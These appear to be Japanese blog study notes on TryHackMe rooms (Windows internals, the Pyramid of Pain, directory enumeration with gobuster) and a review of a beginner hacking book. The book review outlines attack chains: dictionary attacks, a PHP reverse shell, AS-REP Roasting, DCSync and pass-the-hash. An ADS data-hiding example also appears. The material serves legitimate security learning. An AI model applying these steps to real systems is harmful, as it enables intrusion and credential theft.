目的：Windowsのリソース使用状況 (Resource Usage) をリアルタイムで監視するツール。CPU、メモリ、ディスク、ネットワークの使用状況を詳細に確認でき、パフォーマンスの問題解析 (Performance Troubleshooting) や負荷調査 (Load Analysis)、不正なプロセスやサービスの特定に利用される。

主な機能

概要 (Overview)
CPU、メモリ、ディスク、ネットワークの使用状況をまとめて表示。全体のリソース消費を一目で把握できる。

CPU (Processor)
実行中プロセスごとのCPU使用率、スレッド¹、ハンドル数²を表示。高負荷プロセスの特定に利用。

メモリ (Memory)
プロセスごとのメモリ使用量、コミット済み領域³、ハードフォールト数⁴などを表示。メモリリークや不足の調査に役立つ。

ディスク (Disk)
プロセスやファイルごとのディスクI/Oを表示。アクセスが集中しているファイルやボトルネックを特定できる。

ネットワーク (Network)
プロセスごとの送受信データ量、接続先IPアドレスやポート番号を表示。不審な通信の調査に役立つ。

1. プロセスの中で実際に処理を実行する最小単位。 ↩︎
2. Windowsが内部的に使う「番号札」のようなもの。 ↩︎
3. アプリが確保しているメモリ量。 ↩︎
4. 足りないメモリをディスクから引っ張ってきた回数。 ↩︎

レジストリエディター

レジストリエディターは、Windowsに標準搭載されているレジストリ管理ユーティリティ。
Windowsの構成情報（ユーザー設定、アプリケーション、ハードウェア情報など）が保存されているレジストリデータベースを表示・編集できる。
高度な設定変更やトラブルシューティングに役立つが、誤操作はシステム障害につながるため注意が必要。

概要

実行ファイル名：regedit.exe
場所：%systemroot%\system32\regedit.exe
目的：Windows の構成情報を保存している「レジストリ」を表示・編集するための標準ツール。

レジストリとは

Windowsレジストリは、OSやアプリケーション、ハードウェアの設定情報を集中管理するデータベース。

各ユーザーのプロフィール（デスクトップ設定やアプリの個別設定）
レジストリキー：HKEY_CURRENT_USER
コンピューターにインストールされているアプリケーションと関連情報
レジストリキー：HKEY_LOCAL_MACHINE\SOFTWARE
フォルダやアプリケーションアイコンのプロパティ設定（拡張子の関連付けなど）
レジストリキー：HKEY_CLASSES_ROOT
システムに存在するハードウェア（ドライバ・デバイス構成）
レジストリキー：HKEY_LOCAL_MACHINE\SYSTEM
現在のハードウェア構成（起動時のディスプレイやデバイス設定）
レジストリキー：HKEY_CURRENT_CONFIG
PC上の全ユーザーのプロフィール情報
レジストリキー：HKEY_USERS

簡単に言うと、Windowsの設計図や設定ファイルの集まり。

具体例
Windowsのレジストリエディターでユーザーごとのデスクトップ設定を表している部分。

ハイブ (Hive)：HKEY_CURRENT_USER
　→ 現在ログインしているユーザーの設定を格納する領域。
キー (Key)：Control Panel\Desktop
　→ デスクトップの表示や挙動に関する設定が入っている。
値 (Value)：Wallpaper
　→ 壁紙として使用している画像ファイルのパス（場所）が保存されている。

注意点とセキュリティ

レジストリはシステムの中枢なので、誤って編集するとWindowsが起動不能になるリスクがある。
管理者権限（UAC承認）が必要で、通常ユーザーは編集できない。
マルウェアは持続化のためにレジストリを悪用することが多いため、セキュリティの観点からも監査対象になる。

はじめに

Windows Fundamentals 1 の備忘録。
本記事は学習記録です。演習環境のターゲット名・IP・フラグは公開していません。

TryHackMe

Windows Fundamentals 1 In part 1 of the Windows Fundamentals module, we’ll start our journey learning about the Windows desktop, the NTFS file system, UAC, the Control Panel, and more…

Windows Fundamentals 1

ファイルシステム

FAT（File Allocation Table）

登場時期：1977年（MS-DOS時代から利用）
種類：FAT12 → FAT16 → FAT32 と進化
特徴：
シンプルで古いシステムでも互換性が高い。
小型ストレージ（USBメモリ、SDカード）で今も利用される。
制限：
FAT32の場合、1ファイルあたり 最大4GB まで。
パーティションサイズは最大2TB程度まで。
セキュリティ機能なし（アクセス制御や暗号化は不可）。

HPFS（High Performance File System）

登場時期：1989年ごろ、OS/2用にIBMとMicrosoftが共同開発。
特徴：
FATの限界を克服するために開発された。
長いファイル名（255文字）をサポート。
ファイル断片化が少なく、パフォーマンスが良い。
制限：
Windows NT ではサポートされていたが、Windows 2000以降では非推奨。
現在のWindowsでは実質使われていない。

NTFS（New Technology File System）

登場時期: Windows NT（1993年）以降で標準採用。
特徴:
大容量ディスク対応（数TB〜数百TBまでOK）。
セキュリティ機能:
アクセス制御リスト（ACL）によるユーザーごとのアクセス権管理。
暗号化（EFS：Encrypting File System）。
圧縮機能。
ジャーナリング（ログ）機能があり、クラッシュしてもデータ復旧しやすい。
Windowsのシステムドライブ（C:）は通常 NTFS。

NTFSのアクセス権

Full control（フルコントロール）：
すべての操作（削除・権限変更含む）
Modify（変更）：
読み取り + 書き込み + 実行 + 削除
Read & Execute（読み取りと実行）：
読み取り + 実行
List folder contents（フォルダの内容を一覧表示する）：
フォルダー単位の権限で、ファイル名一覧の参照やサブフォルダの辿りを許可する。ただしファイルの内容を読むには Read権限が必要。
Read（読み取り）：
ファイル閲覧
Write（書き込み）：
ファイルの作成・変更
Special permissions（特殊なアクセス許可）：
細かくカスタマイズされたアクセス権

代替データストリーム（ADS）

代替データストリーム（ADS）は、NTFSファイルシステムの機能で、ファイルに追加の隠しデータを保存できる仕組み。セキュリティ上は、攻撃者に悪用される可能性があるため注意が必要。
通常のファイルは「メインデータストリーム（:$DATA）」を持つが、ADSを使うと、同じファイル名の下に隠れた追加データを保存できる。

例えば、example.txt というテキストファイルがあるとした場合。

# example.txtを作成
echo Hello > example.txt

# 代替データストリームを追加
cmd /c "echo Secret > example.txt:hidden"

# ファイル本体の内容を確認
Get-Content .\example.txt
# => Hello

# 特定ストリームの内容を確認
Get-Content .\example.txt -Stream hidden
# => Secret

# ファイルに含まれる全ストリームを列挙
Get-Item .\example.txt -Stream *

PSPath        : Microsoft.PowerShell.Core\FileSystem::C:\Users\Administrator\Downloads\example.txt::$DATA
PSParentPath  : Microsoft.PowerShell.Core\FileSystem::C:\Users\Administrator\Downloads
PSChildName   : example.txt::$DATA
PSDrive       : C
PSProvider    : Microsoft.PowerShell.Core\FileSystem
PSIsContainer : False
FileName      : C:\Users\Administrator\Downloads\example.txt
Stream        : :$DATA
Length        : 16

PSPath        : Microsoft.PowerShell.Core\FileSystem::C:\Users\Administrator\Downloads\example.txt:hidden
PSParentPath  : Microsoft.PowerShell.Core\FileSystem::C:\Users\Administrator\Downloads
PSChildName   : example.txt:hidden
PSDrive       : C
PSProvider    : Microsoft.PowerShell.Core\FileSystem
PSIsContainer : False
FileName      : C:\Users\Administrator\Downloads\example.txt
Stream        : hidden
Length        : 9

example.txt → 通常の内容は「Hello」
example.txt:hidden → 隠しストリームに「Secret」が保存される
表面上のファイルサイズは「Hello」の分しか表示されず、「Secret」が隠れていることは分からない。

Windows\System32 フォルダ

Windowsオペレーティングシステムが含まれるフォルダー。

何が入っているか（要約）

実行ファイル (.exe)：cmd.exe、taskmgr.exe、regedit.exe など、Windows の基本ユーティリティ。
ライブラリ (.dll)：システムAPIやサービスが依存する共有ライブラリ群。
ドライバやサポートファイル：デバイス制御やカーネル操作に必要なファイル。
コマンドラインツール：ipconfig.exe、sfc.exe、sc.exe などトラブルシュート用ツール。
リソース・ロケール・設定ファイル：言語ファイルやリソースが入る場合あり。

なぜ重要なのか

Windowsのコア機能（起動、ログオン、デバイス管理、ネットワーク、セキュリティなど）のほとんどがこれらのファイルに依存している。
ここを壊すとシステムが起動しなくなったり、機能が失われたりする。

64-bit Windowsでよく混乱すること

System32 = 64-bitバイナリ（64ビットWindows上）
SysWOW64 = 32-bitバイナリ（WOW64互換サブシステム用）
→名前だけ見ると逆に見えるので要注意。32-bitプロセスからアクセスすると自動でリダイレクトされる（ファイルシステムリダイレクション）。

権限と保護

多くのファイルはTrustedInstaller（SYSTEM や TrustedInstaller 所有）に所有されており、削除や上書きには管理者権限＋追加操作が必要。
UAC（管理者承認） が働くので、通常ユーザーは書き込み不可。
重要：安易にファイルを削除・置換するとシステムが不安定になり、最悪起動不能になる。

セキュリティ観点

マルウェアはしばしば System32 にファイルを植え付けようとする（隠蔽や永続化のため）。
正規ツールと同名の偽ファイルを置く「DLLハイジャック」などの攻撃もある。
定期的に sfc /scannow や DISM で整合性チェックを行うのが推奨。
※sfcやDISMを実行する際は、よく調べて自己責任で実行をすること。一部環境では非推奨なこともあり。

ユーザーアカウント、プロファイル、権限

lusrmgr.msc

「ローカルユーザーとグループ (Local Users and Groups) 管理ツール」 を開くための管理コンソール。
Windows Home エディションでは利用できず、Pro/Enterprise/Education のみ。
ファイルの場所: C:\Windows\System32\lusrmgr.msc

できること

・ユーザー管理
ローカルユーザーアカウントの作成・削除
パスワードの設定・リセット
アカウントの有効化/無効化
アカウントのプロパティ（ログオンスクリプト、ホームフォルダなど）の編集

・グループ管理
ローカルグループの作成・削除
グループにユーザーを追加/削除
標準のグループ（Administrators, Users, Guests など）のメンバー管理

ユーザーアカウント制御（UAC）

UAC（User Account Control）とはアプリケーションやプロセスが「管理者権限での操作」を実行しようとしたときに確認を求め、不正なプログラムによるシステム変更を防ぐ仕組み。

仕組み

・通常ログイン時
管理者ユーザーでも、普段は「標準ユーザー権限」でアプリを動かす。
（＝常にフル権限で動かさないことで被害を最小化）

・アプリが管理者権限を要求したとき
画面が暗転し、「このアプリがデバイスに変更を加えることを許可しますか？」と確認。
→ ユーザーが「はい」を選択すれば昇格して実行。

・標準ユーザーのアカウントの場合
UAC ダイアログが出たとき、管理者のユーザー名とパスワードを入力しないと許可されない。

具体的な例

インストーラーを実行するとき
レジストリを変更するとき
System32などシステムフォルダにファイルをコピーするとき

設定

コントロールパネル → ユーザーアカウント → ユーザーアカウント制御設定の変更
スライダーでレベル調整できる（常に通知する～通知しない）。
既定値は「アプリがコンピューターに変更を加えようとする場合のみ通知」。

タスクマネージャー

Windowsに標準搭載されているシステム管理ツール。
主にプロセス（アプリやサービスの実行状況）やリソース使用状況 を監視・管理するために使われる。
セキュリティや運用管理の観点では、不審なプロセスの確認・停止、パフォーマンス監視、ユーザーセッション管理に役立つ。

主な機能（タブごと）

プロセス (Processes)
実行中のアプリ、バックグラウンドプロセス、Windows サービスが一覧表示。
CPU、メモリ、ディスク、ネットワークの使用率を確認できる。
不審なプログラムが動作していないかの確認に使う。

パフォーマンス (Performance)
CPU、メモリ、ディスク、ネットワーク、GPU などのリソース利用状況をグラフ表示。
リアルタイムで負荷状況を把握できる。
障害対応やキャパシティ管理に役立つ。

アプリの履歴 (App history)
Windows ストアアプリのリソース使用履歴を表示。
ChatGPT曰く、モバイルや省電力管理に近い用途らしい。

スタートアップ (Startup)
Windows 起動時に自動実行されるプログラムを一覧表示。
有効/無効の切り替えが可能 → 不要な自動起動を止めてセキュリティ強化や高速化。

ユーザー (Users)
現在ログインしているユーザーと、そのセッションのリソース消費を表示。
不正アクセスや、誰が負荷をかけているかの調査に使える。

詳細 (Details)
実行中プロセスをより詳細に表示（PID, 状態, ユーザー名, 優先度など）。
高度なトラブルシューティングに利用。

サービス (Services)
Windows サービスを一覧表示（実行中か停止中か）。
サービスの開始・停止・再起動が可能。

その他

なぜかSplit Viewでターゲットマシンを使っていると、定期的に「Connecting to remote machine…」となり接続できなくなったため、kali linuxからRDP接続に切り替え。
kali linuxからRDP接続では安定していた。

RDPがインストールされていなかったため、インストールから接続までのコマンドを記載。

# FreeRDPがインストールされているか確認
which xfreerdp3

# インストール
sudo apt update
sudo apt install freerdp3-x11 -y

# RDP接続（※パスワード指定は履歴に残るので注意）
xfreerdp3 /v:IPアドレス /u:'ユーザー名' /p:'パスワード'

はじめに

Pyramid of Painの備忘録。
本記事は学習記録です。演習環境のターゲット名・IP・フラグは公開していません。

TryHackMe

Pyramid Of Pain Learn what is the Pyramid of Pain and how to utilize this model to determine the level of difficulty it will cause for an adversary to change the indicators ass…

Pyramid of Pain

Task 1　Introduction

Pyramid of Pain（ピラミッド・オブ・ペイン）

サイバー脅威ハンティングやインシデント対応で使われる有名な概念図。
下から上にいくほど、攻撃者にとって回避が難しく、防御側にとって価値が高い指標。
IoCの種類ごとに攻撃者への“痛み”の度合いを示すモデル。

• ハッシュ値（Hash Values）
  マルウェアファイルのハッシュ（MD5/SHA1など）。
  攻撃者はファイルを少し変更すればハッシュは簡単に変えられるため、防御効果は低い。
  
  
• IPアドレス（IP Addresses）
  攻撃元やC2サーバーのIP。
  攻撃者はプロキシやVPNを変えればすぐ別のIPが使える。
  
  
• ドメイン名（Domain Names）
  マルウェア通信に使われるドメイン。
  取得し直すのに多少コストがかかるが、比較的簡単に回避可能。
  
  
• ネットワーク/ホストアーティファクト（Network/Host Artifacts）
  特徴的な通信パターン、レジストリキー、ファイル名など。
  攻撃者は修正できるが、調整には労力がかかる。
  
  
• ツール（Tools）
  攻撃に使うマルウェアやフレームワーク（例：Mimikatz、Cobalt Strike）。
  独自に開発したツールを封じられると、再開発や入手に時間がかかるため痛手。
  
  
• TTPs（Tactics, Techniques, and Procedures：戦術・技術・手順）
  攻撃者の行動様式そのもの。MITRE ATT&CKで定義されるような「どんな手口で侵入・横展開・窃取するか」という戦略的パターン。
  ここを把握して防御すると、攻撃者は根本的に戦術を変えざるを得ないため、最も「痛い」。

Task 2　Hash Values (Trivial)

ハッシュ検索ツール

• VIRUSTOTAL
  世界中のセキュリティベンダーの検知結果を集約し、ハッシュ値を入力すると、そのファイルが既知のマルウェアかどうか即座に確認できる。
  
  
• Metadefender Cloud – OPSWAT
  マルチスキャンエンジンを利用し、ファイルの安全性や改ざん有無を検証できる。

セキュリティ研究レポート

• The DFIR Report
  実際の攻撃事例に基づき、どのようなマルウェアがどの環境で使われたのかを詳細に解説。
  
  
• Trellix Research
  セキュリティベンダーによる最新の脅威動向や解析記事が公開されている。

Task 3　IP Address (Easy)

• Fast Flux（ファストフラックス）
  サイバー攻撃者がDNSを悪用して、自分たちのサーバ（フィッシングサイト、マルウェア配布サイト、C2サーバなど）を隠したり、耐障害性を高めたりする技術。

Task 4　Domain Names (Simple)

• Punycode（ピュニコード）攻撃
  国際化ドメイン名（IDN）を悪用したフィッシング攻撃の一種。
  
  ・Punycodeとは
  　ASCIIで記述できないUnicode文字（漢字やキリル文字など非ASCII文字）をASCII互換文字列に変換する方式。
  
  ・国際化ドメイン名（IDN）とは
  　世界中の利用者向けに、漢字・ひらがな・キリル文字（ロシア語）、ギリシャ文字などをドメインに使えるようにした仕組みが 国際化ドメイン名（IDN）。
  
  ・攻撃の仕組み
  　攻撃者は見た目が正規サイトと同じに見えるドメインを登録できる。
  　
  　例：
  　本物： apple.com
  　偽サイト： аррӏе.com （キリル文字の「а」「р」「ӏ」「е」を使用）
  
  　人間の目には「apple.com」に見えるが、実際は別のドメイン。
  　ブラウザのアドレスバーでは apple.com と表示される場合もあり、ユーザーが気づきにくい。
  
  
• URL短縮サービス
  長いURL（Webアドレス）を短く変換してくれるサービス。
  本当の遷移先が見えないため、フィッシング詐欺やマルウェア配布に悪用されることがある。
  信頼できない短縮URLは直接クリックせず、「プレビュー機能」や展開ツールを使って遷移先を確認すると安全。
  
  攻撃者は通常、以下のURL短縮サービスを利用して悪意のあるリンクを生成。
  ※Pyramid of Pain　Task 4Domain Names (Simple)　より引用

• bit.ly
• goo.gl
• ow.ly
• s.id
• smarturl.it
• tiny.pl
• tinyurl.com
• x.co

　　・短縮URLサービスの公式プレビュー機能
　　　TinyURL → https://preview.tinyurl.com/xxxx
　　　bit.ly → 短縮URLの末尾に「+」を付けるとプレビュー画面が表示されます。
　　　例： https://bit.ly/3xyzabc に「+」をつけて https://bit.ly/3xyzabc+
　　
　　・専用の展開サービス
　　　CheckShortURL
　　　Unshorten.me

• Any.run
  マルウェア解析サンドボックスサービス。
  後述のTask5にてAny.run解析レポートの内容について簡易的に紹介。

Task 5　Host Artifacts (Annoying)

• Any.run解析レポートの簡易解説
  
  ・General Info（基本情報）
  　サンプルファイル名、ハッシュ値（MD5, SHA1, SHA256）、実行環境などが記載されている。
  
  ・Behavior Activities（挙動）
  　Malicious（悪意あり）、Suspicious（不審）、Info（情報レベル）。
  
  ・Malware configuration（マルウェアの設定情報）
  　マルウェアが内部に持つ設定パラメータ。
  　マルウェアの「行動方針」や「攻撃先」「通信手段」などが書かれている。
  
  ・Static Information（スタティック情報）
  　マルウェアファイルそのものを実行せずに解析して得られる基本的な情報。
  
  ・Video and Screenshots（ビデオとスクリーンショット）
  　マルウェアの挙動を記録・可視化した映像と画面キャプチャ。
  
  ・Processes（プロセス）
  　作成・実行されたすべてのプロセスの詳細な動きを可視化。
  
  ・Registry Activity（レジストリ操作の記録）
  　マルウェアがレジストリキーや値を「読み取り・作成・変更・削除」した履歴を時系列で記録。
  　永続化（自動起動）・構成変更・痕跡隠蔽・情報収集などの重要な行動の証拠になる。
  
  ・Files Activity（ファイルの操作履歴）
  　マルウェアがどのファイルを作ったか、変更したか、消したかを記録。
  　実際に何を「感染先に落とす（ドロップ）」かを確認できる重要な手がかり。
  
  ・Network Activity（ネットワーク通信の記録）
  　マルウェアが外部と通信した IPアドレスやドメイン名、プロトコル、ポート番号などを一覧で表示
  　C2サーバー（攻撃者の遠隔操作先）との通信、ファイルダウンロード、情報送信などの証拠を発見できる
  
  ・Debug output strings
  　実行中のマルウェアやプログラムが内部的に出力したデバッグメッセージのログを表示する。

Task 6　Network Artifacts (Annoying)

• tshark
  コマンドラインのパケット解析ツール。
  
  
• User-Agentの代表例
  IE系: MSIE、Trident
  Chrome系: Chrome/xx
  Firefox系: Firefox/xx
  Safari系: Safari/xxx（ただしChromeにも含まれるので注意）
  
  
• 設問：上記のスクリーンショットに表示されている User-Agent 文字列を使用するブラウザはどれですか? のヒント
  
  User-Agent 文字列
  Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; …)
  
  MSIE 7.0 と書かれている → 「Internet Explorer 7」に見せかけている。
  しかし、Trident/7.0 というIE互換レンダリングエンジンが使われている → これは Internet Explorer 11 が使うエンジン。
  つまり本当は Internet Explorer 11 で、互換モードを示す UA を偽装しているケース。
  
  
• なぜUser-Agentを偽装するのか
  検知回避（evasion technique）のため。
  
  ・古いInternet Explorer（IE7など）を偽装すると、大量に存在する正常なトラフィックと同じように見えるため、セキュリティ監視の目から隠れやすくなる。
  
  ・セキュリティ機器は、User-Agent の文字列に応じて検査の深さを変える場合があり、古いブラウザに特化した通信は「既知の安全なもの」として扱われ、詳細な検査をスキップすることがある。
  
  ・「IE 7.0」など人間が普通に使っていそうなものはホワイトリストに入っているケースもあり、ブロックを回避できる。

Task 7　Tools (Challenging)

• fuzzy hash
  似ているファイル同士を比較するためのハッシュ技術。
  通常のハッシュ（MD5、SHA256など）では不可能な、「類似度の比較」ができる。
  
  
• SSDEEP
  fuzzy hashの一種。
  ファイルを小さなブロック単位で比較し、類似性に基づくハッシュ（fuzzy hash）を生成。

Task 8　TTPs (Tough)

• MITRE  ATT&CK
  サイバー攻撃者が現実に使う戦術（Tactics）、技術（Techniques）、手順（Procedures）を体系的にまとめたナレッジベース。
  
  たとえば、Task5のレポートの場合、MITRE  ATT&CKに照らし合わせると
  
  – 初期アクセス：T1566.001（スピアフィッシング＋添付ファイル）
  – 実行：T1059.001（PowerShell）
  – C2通信：T1071.001（HTTPなど）
  
  などが該当する。

Task 9　Practical: The Pyramid of Pain

Pyramid of Painの演習問題。
各IoCレベル（ハッシュ値・IPアドレス・ドメインなど）の特徴を理解していれば解答可能。

Task 10　Conclusion

• Rapid7 の Advanced Persistent Threat Groups (APT Groups)
  Rapid7（ラピッドセブン）社 が公開している脅威インテリジェンス情報のまとめページ／ナレッジベース。

はじめに

Offensive Security Introの備忘録。
本記事は学習記録です。演習環境のターゲット名・IP・フラグは公開していません。

TryHackMe

Offensive Security Intro Hack your first website (legally in a safe environment) and experience an ethical hacker’s job.

つまずいたことと解決策

名前解決ができない

http://TARGET_HOSTの名前解決ができないのでhostsファイルに追記。

# 一時的に /etc/hosts に追加（sudo 必要）
echo "IPアドレス	TARGET_HOST" | sudo tee -a /etc/hosts

# hosts が有効に使われているか確認
getent hosts TARGET_HOST

# ping（ネットワーク疎通）
ping -c 3 TARGET_HOST

# HTTP ヘッダ確認（ポート80で応答があるか）
curl -I http://TARGET_HOST || true

dirbが遅い

TryHackMeの指示通りにdirbで探索すると30分近くかかってしまったので、以降はgobusterで代用。

gobusterのインストールとバージョン確認。

# インストールされているか確認（返ればインストール済み）
command -v gobuster && echo "installed" || echo "not installed"

# バージョン確認
gobuster version

実行してみる。2～3分くらいで完了。

# gobusterで高速ディレクトリ列挙（threads=40, 拡張子絞り）
gobuster dir -u http://TARGET_HOST -w ~/small-common.txt -t 40 -x php,html,txt,zip,tar -o gobuster_small.out

ディレクトリが見つからない

教材の例では bank-deposit ディレクトリが見つかることになっているが、手元の環境ではヒットしなかった。

Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

[+] Url:                     http://TARGET_HOST
[+] Method:                  GET
[+] Threads:                 40
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,txt
[+] Timeout:                 10s

Starting gobuster in directory enumeration mode

/css               (Status: 301) [Size: 173] [--> /css/]
/fonts             (Status: 301) [Size: 177] [--> /fonts/]
/images            (Status: 301) [Size: 179] [--> /images/]
/Images            (Status: 200) [Size: 10373]
/js                (Status: 301) [Size: 171] [--> /js/]

Progress: 18456 / 18460 (99.98%)

Finished

common.txtでbank-depositがヒットしないのでこれが原因のよう。

grep -n 'bank-deposit' /usr/share/dirb/wordlists/common.txt || true

directory-list-2.3-medium.txtでも見つからない。

grep -n 'bank-deposit' /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt || true

仕方ないのでワードリストを作ってヒットさせる。

#ワードリスト"mylist.txt"を作成
echo -e "bank-deposit\nbankdeposit\nbank" > ~/mylist.txt

#mylist.txtで探索
gobuster dir -u http://TARGET_HOST -w ~/mylist.txt -t 40 -x php,html,txt,zip,tar -o gobuster_small.out

はじめに

TryHackMeとは

TryHackMe（トライハックミー） は、世界中で人気のあるサイバーセキュリティ学習プラットフォームです。
クラウド上に用意された仮想環境を使って、ハッキング技術やセキュリティ対策を実際に手を動かしながら学べるのが特徴です。環境構築がほぼ不要で無料の会員登録だけでハッキング演習をできるので、ハッキングをやってみたいけれど、何から始めればいいのか分からない方に特におすすめです。

TryHackMe

TryHackMe | Cyber Security Training TryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs, all through your browser!

7日間でハッキングをはじめる本とは

TryHackMeを利用してハッキングをしてみる本です。
最初は環境構築からはじまり、簡単な攻撃や各種ハッキングツールの利用方法などが学べます。
環境構築から始まるため、初心者でもつまずかずにTryHackMeに挑戦できる良書でした。
初心者向けのため、業務経験がある方や、すでに勉強を始めている方には物足りないかもしれません。

本書によると前提条件・知識は
①自分のパソコンを持っている：必須
②インターネットにつながる環境がある:必須
③ Linuxを触ったことがある：推奨
　・黒い画面にアレルギ-がない
　・ ls 、 cd 、cat などの基本的なコマンドを使って操作することができる
とのことです。

Shoeisha

7日間でハッキングをはじめる本 TryHackMeを使って身体で覚える攻撃手法と脆弱性 | 翔泳社 サイバーセキュリティ学習サイトを攻略しながら ハッキング／セキュリティの「基本」を体験しよう サイバー攻撃の増加に伴い、セキュリティを専門にしないITエンジニアであ…

この本を手に取ったきっかけ

CISSPに合格したもののインプットだけでアウトプットができていなかったので次は手を動かした勉強がしてみたいと思い、初心者向けらしいこの本から取り掛かってみることにしました。特に「この本でなければいけない!」というこだわりはありませんでしたが、ハッキング最初の一歩としては正解の一冊だったと感じています。

ちなみにCISSP合格体験記も書いているので興味があればご覧下さい。

セキュリティエンジニアの雑多ブロ…

CISSP合格体験記2025｜独学3か月・170時間の勉強で一発合格！ 2025年8月にCISSP試験に合格しました。勉強期間3か月・170時間で使用した教材や模擬試験の結果、試験当日の流れ、合格のポイントを詳しくまとめています。

Day1～Day7

本書はタイトルの通り7日間で無理なく学べるように内容が区切られています。
目標がはっきりしているので取り組みやすかったです。
各日の内容は以下のとおりです。

Day1 ハッキングの準備をしよう
Day2 はじめてのハッキング
Day3 悪用厳禁のエクスプロイトを試してみよう
Day4 よくある脆弱性を使って怪しいショップで遊ぼう
Day5 Webフォームから侵入しよう
Day6 Active Directoryのハッキング実践
Day7 WordPressのハッキング実践

Day1 ハッキングの準備をしよう

まずは環境構築です。
Kali LinuxやVirtual Boxのインストール、TryHackMeの登録などを行います。

私はLinuxの業務経験があったので特に難しいと感じることはなかったですが、設定したパスワードをタイプミスして
Linuxにログインできなくなるというまさかの凡ミスをしました。実務でやってしまうと非常にまずい。気を付けなければ。

後はInternal Virtual IP Addressが0.0.0.0のまま変わらず躓きました。
他の方のブログを見ていても同じ事象が起きているようで、最終的にここは変わっていなくてもVPN接続ができていれば問題なさそうだったので本書の通りとはいかなかったですが、そのまま進めました。

Day2 はじめてのハッキング

ここからが本書の本題です。
このセクションでは辞書攻撃とマシンへの侵入を行います。

ここで利用するツールは以下のとおりです。
・nmap
・dirb(辞書ファイルはsmall.txt)
・hydra(辞書ファイルはrockyou.txt)

本書の通りにやっていれば特に問題なく進めるかと思います。
本書を進めていくと色々なツールが出てきてだんだん分からなくなってくるので、何の目的でツールを使っているのか、自分は今攻撃のどの段階にいるのか一言メモなどで残しておくといいかもしれません。

【本セクションでの個人的メモ】
・dirbとhydraの違い
　どちらもブルートフォース系のツール
　dirb→ディレクトリ探索用
　hydra→認証システム用
・ロードマップ
　1.ポートスキャン
　2.ディレクトリ探索
　3.共有フォルダーへ侵入
　4.辞書攻撃
　5.侵入

Day3 悪用厳禁のエクスプロイトを試してみよう

このセクションでは脆弱性を悪用したマシンへの侵入と侵害を行います。

ここで利用するツールは以下のとおりです。
・nmap
・Metasploit
・xfreerdp

今回のターゲットマシンはWindowsです。
Windowsの業務経験がなかったので少し不安でしたが、事前知識がなくても問題なく進められました。

【本セクションでの個人的メモ】
・Metasploitの「モジュール」と「ペイロード」
　モジュール→攻撃や支援のための部品
　ペイロード→エクスプロイト成功後にターゲット上で実行されるコード
・ロードマップ
　1.ポートスキャン
　2.脆弱性調査
　3.脆弱性を悪用したマシンへの侵入
　4.ターゲットマシンの操作
　5.情報窃取

Day4 よくある脆弱性を使って怪しいショップで遊ぼう

このセクションではWebサービスへの侵入と侵害を行います。

ここで利用するツールは以下のとおりです。
・BurpSuite(辞書ファイルはbest1050.txt)

このあたりから本格的なハッキングになってきます。
BurpSuiteは初めて触ったのですが、HTTPログの閲覧、デベロッパーツール、POSTデータの改変など簡単に便利機能を使えて感動しました。

【本セクションでの個人的メモ】
・ロードマップ
　1.Webサイトを探索
　　├ユーザー登録
　　└レビュー投稿
　2.SQLインジェクション、管理画面アクセス
　3.サイト改変
　4.辞書攻撃

Day5 Webフォームから侵入しよう

このセクションではWebフォームへの侵入と権限昇格を行います。

ここで利用するツールは以下のとおりです。
・nmap
・FTP
・dirb
・BurpSuite(辞書ファイルはextensions-most-common.fuzz.txt)
・リバースシェル(php-reverse-shell.php)

内容が濃くなってきて今まで1時間30分～2時間程度でセクション完了していましたが、3時間くらいかかるようになってきました。
今回は初期侵入→権限昇格と現実のハッカーっぽい挙動です。

【本セクションでの個人的メモ】
・SUID
　実行時に「ファイル所有者」の権限で動作する。典型例はpasswd。
・ロードマップ
　1.ポートスキャン
　2.FTPへの侵入→失敗
　3.サイト調査
　　└ディレクトリ探索
　4.アップロードフォーム調査
　　└利用可能拡張子の探索
　5.リバースシェルによる初期侵入
　6.権限昇格

Day6 Active Directoryのハッキング実践

このセクションではActive Directoryのハッキングを行います。

ここで利用するツールは以下のとおりです。
・nmap
・Kerbrute
・Impacket
・hashcat
・Evil-WinRM

Kerberos認証やNTLM認証などが登場してきました。これらは仕組みを知らなかった人には少し難しく感じるかもしれません。私自身もActive Directoryへの攻撃に詳しくなかったのでAS-REP Roasting攻撃やDCsync攻撃は初めて知りました。個人的にはこのセクションが最も難しかったです。

【本セクションでの個人的メモ】
・Kerbrute
　Kerberos環境での「ユーザー列挙」や簡単なブルートフォースを行うツール
・Impacket
　Pythonベースのライブラリ兼ツール群で、Windows/AD のプロトコル(SMB, DCE/RPC, Kerberosなど)を操作するための実装集
・hashcat
　GPU(やCPU)で超高速にハッシュを総当たり／辞書攻撃するためのパスワードクラッキングツール
・Evil-WinRM
　Windows 標準のWinRM(Windows Remote Management)サービスを使ってPowerShellリモートシェルを得るためのツール
・AS-REP Roasting攻撃
　Pre-Authentication(事前認証)を無効化しているアカウントに対してAS-REQを送り、KDCが返す暗号化された応答(AS-REP)を取得し、オフラインで解析(総当たり／辞書攻撃)してパスワードを推測する攻撃
・DCsync攻撃
　ADのレプリケーション機能(Directory Replication Service Remote Protocol, MS-DRSR)を悪用して、ドメインコントローラから直接ユーザーのハッシュ(NTLMなど)やkrbtgtのハッシュを取得する攻撃
・ロードマップ
　1.ポートスキャン
　2.ポートスキャン(詳細調査)
　3.Kerbruteによる辞書攻撃でユーザー名を割り出す
　4.上記3で入手したユーザー名を使いAS-REP Roasting攻撃
　5.hashcatでハッシュ値からパスワードを特定
　6.得られたユーザー名とパスワードを使い、共有フォルダーを探索(ここで別ユーザのパスワードを発見)
　7.上記6で見つけたユーザーはバックアップ用のユーザーなのでDCsync攻撃
　8.上記7のDCsync攻撃で得られたAdministratorでPass the Hash攻撃

Day7 WordPressのハッキング実践

ついに最後のセクションです。
このセクションではWordPressのハッキングを行います。

ここで利用するツールは以下のとおりです。
・steghide
・wpscan(辞書ファイルはrockyou.txt)
・Metasploit
・LinPEAS

このサイトもWordPressで作成しているため実際にハッキングしていて恐怖を感じました。(もちろんセキュリティには気を付けていますが…)
最後のセクションなので長丁場になるかと思いましたが、Day6よりも時間がかからず比較的簡単でした。

【本セクションでの個人的メモ】
・LinPEAS
　Linuxシステム用の権限昇格に使える設定ミスを教えてくれるツール。Windows用はWinPEAS、Mac用はMacPEAS。
・ロードマップ
　1.ポートスキャン
